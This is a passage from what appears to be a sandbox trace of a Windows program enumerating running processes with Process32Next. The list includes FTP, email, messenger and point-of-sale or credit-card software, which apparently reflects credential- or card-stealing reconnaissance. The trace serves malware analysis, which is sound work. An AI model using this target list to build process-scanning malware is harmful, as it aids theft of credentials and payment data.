pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0208.854] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0208.858] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x21c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0208.859] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0208.861] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0208.862] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x30c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1fc, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0208.864] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x46, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0208.865] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x378, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0208.866] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x390, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0208.868] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0208.869] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0208.937] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x210, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0208.940] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x460, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0208.943] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0208.946] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0208.948] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x604, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0208.952] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x64c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0208.954] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2f, th32ParentProcessID=0x798, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0208.956] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0208.958] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x894, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0208.959] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x908, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0208.961] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbd0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0208.962] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xba8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0208.969] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xad4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0208.972] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x670, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0208.975] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x9d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0208.978] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x128, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x670, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0209.029] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x428, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="degree_sing_pretty.exe")) returned 1 [0209.031] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="work-heavy.exe")) returned 1 [0209.033] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="member.exe")) returned 1 [0209.035] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="real-new.exe")) returned 1 [0209.037] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="letter.exe")) returned 1 [0209.038] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="lightwhere.exe")) returned 1 [0209.040] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="charge_model_ready.exe")) returned 1 [0209.042] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fearfew.exe")) returned 1 [0209.045] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bag-begin-gas.exe")) returned 1 [0209.046] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="take whether.exe")) returned 1 [0209.048] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="common trade station.exe")) returned 1 [0209.050] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xda8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="small_money.exe")) returned 1 [0209.051] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdbc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="magazineofficialteach.exe")) returned 1 [0209.053] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="involve.exe")) returned 1 [0209.054] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdd4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="religious_free_generation.exe")) returned 1 [0209.056] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="hair friend will.exe")) returned 1 [0209.059] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdf4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whose.exe")) returned 1 [0209.061] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe80, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0209.062] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0209.064] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0209.066] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0209.067] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0209.069] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0209.070] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xec4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0209.072] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xecc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0209.124] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xed4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0209.126] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xedc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0209.128] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0209.130] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0209.132] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0209.134] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf1c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0209.136] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0209.139] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0209.141] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf4c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0209.143] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0209.145] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0209.147] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0209.150] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0209.154] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf8c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0209.155] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0209.157] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfa0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0209.159] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0209.161] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0209.162] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfd0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0209.164] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfe0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0209.166] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xff4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0209.197] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x878, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0209.199] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x858, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0209.201] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0209.203] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0209.204] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x660, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0209.206] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0209.207] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x72c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0209.209] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1004, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0209.211] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1014, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0209.212] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x101c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0209.214] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x102c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0209.219] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x103c, th32DefaultHeapID=0x0, th32ModuleID=0x0, 